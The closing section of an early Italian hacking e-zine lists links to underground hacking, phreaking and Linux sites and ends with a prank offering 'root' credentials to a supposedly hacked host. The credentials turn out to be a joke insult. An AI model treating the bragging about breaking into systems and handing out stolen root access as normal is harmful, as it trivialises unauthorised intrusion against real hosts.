010æ10@10Æ1ß01%01010&10ß| LINKS |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Ed ecco un pò di links che potrebbero rivelarsi utili in qualsiasi occasione:

....Underground Site....

-http://www.x-system.cjb.net
Il sito ufficiale della nostra e-zine

-http://members.xoom.it/lelolo
Il mio sito

-http://www.bismark.it
Non credo ci sia bisogno di spiegazioni...

-http://www.packetstormsecurity.com
Exploit, patch, security, sito da visitare ogni giorno ;-)

-http://napolihak.da.ru
Sito che tratta di hacking,phreaking,linux,con una sezione abbastanza
fornita di manuali in italiano,traduzioni o in lingua originale

-http://www.quequero.cjb.net
Sito ufficiale di Quequero

-http://www.ilfronte.net
Buon sito,con un forum sempre più in crescendo,e che ospita nientepopodimeno
che Mimmuz e l'ormai latitante MrWolf(scherzo!)

-http://www.raulken.it
Neanche in questo caso non credo ci sia bisogno di spiegazioni...

-http://www.feelinglinux.com
http://www.valtellinux.com
http://www.RedHat.it

-http://www.spippolatori.com
A quanto si legge sul sito ("www.spippolatori.com is coming...) dovrebbero
essere online tra qualche tempo...

-http://members.xoom.it/_XOOM/e4zy/nuovo/main.htm
L'Hacking Time di E4zy ;) Davvero un buon sito, peccato che (se non ricordo
male) non viene aggiornato da molto...

-http://digilander.iol.it/kaos
Altro buon sito di Hack. Visitatelo ;)

-http://www.bigalex.cjb.net
Il portale dove potrete trovare molti links a tutto ciò che riguarda il
mondo Undeground ma anche molto altro! Bel lavoro, Biga!

-http://www.bartx.cjb.net
Il sito di Bartx, ricco di materiale molto interessante...

-http://digilander.iol.it/Delilahh
Il sito di Delilah, ben fatto e aggiornato. Brava Dely!

-http://www.bucailsito.it
Interessante concorso per chi ha voglia di giocare o tempo da perdere ;-)

-http://www.programmazione.it
Tutto e di + sulla programmazione!

-http://www.html.it
Un sito che dovrebbe interessare tutti i webmaster!

....Altri....

-http://www.ruttando.com
Sito che ha indetto un concorso sul miglior rutto e la miglior
scorreggia.Peti e rutti in graduatoria da ascoltare!

Eccoli tutti qui... Spero di averli scritti tutti giusti ;) e di non avermi
dimenticato di qualche amico che poi mi spenna ;DD
Se per voi questi sono pochi, beh, ci scusiamo, in futuro ne scriveremo
senz'altro molti altri.
Se volete segnalare il vostro sito, mandate tutto a x-system@email.it e magari
troverete il vostro sito nella prox uscita dell'ezine. ;-)


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| T H E E N D |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"
1010
01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Ragazzi l'e-zine è finita... Spero vi sia piaciuta e che possa essere servita
a qualcuno di voi... In ogni caso un arrivederci a due mesi. La data
dell'uscita del 2° numero dell'e-zine è ancora da destinarsi, non la scrivo
qui perchè tra 2 mesi chissà quanti impegni mi potrei avere proprio quella
sera! Non si sa mai... ;) Un saluto a tutti i lettori di questa neonata e-zine!


Ma che volete leggere ancora? Okkey... Visto che oggi sono MOLTO buono qui in
fondo nelle ultime righe di questa neonata e-zine troverete user e pass di un
piccolo sistema da me bucato...

















































regalino: account con diritti r00t ;))
host: computersys.org
user: "
chi legge"
pass: "
è scemo"
Mi raccomando scrivete tutto senza apici!! ;))
PS : ahahah.. che burlone che sono... ihihih Non cambierò mai... Ma
davvero siete arrivati qui a leggere ?!? ihihihih.. ele...










































next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT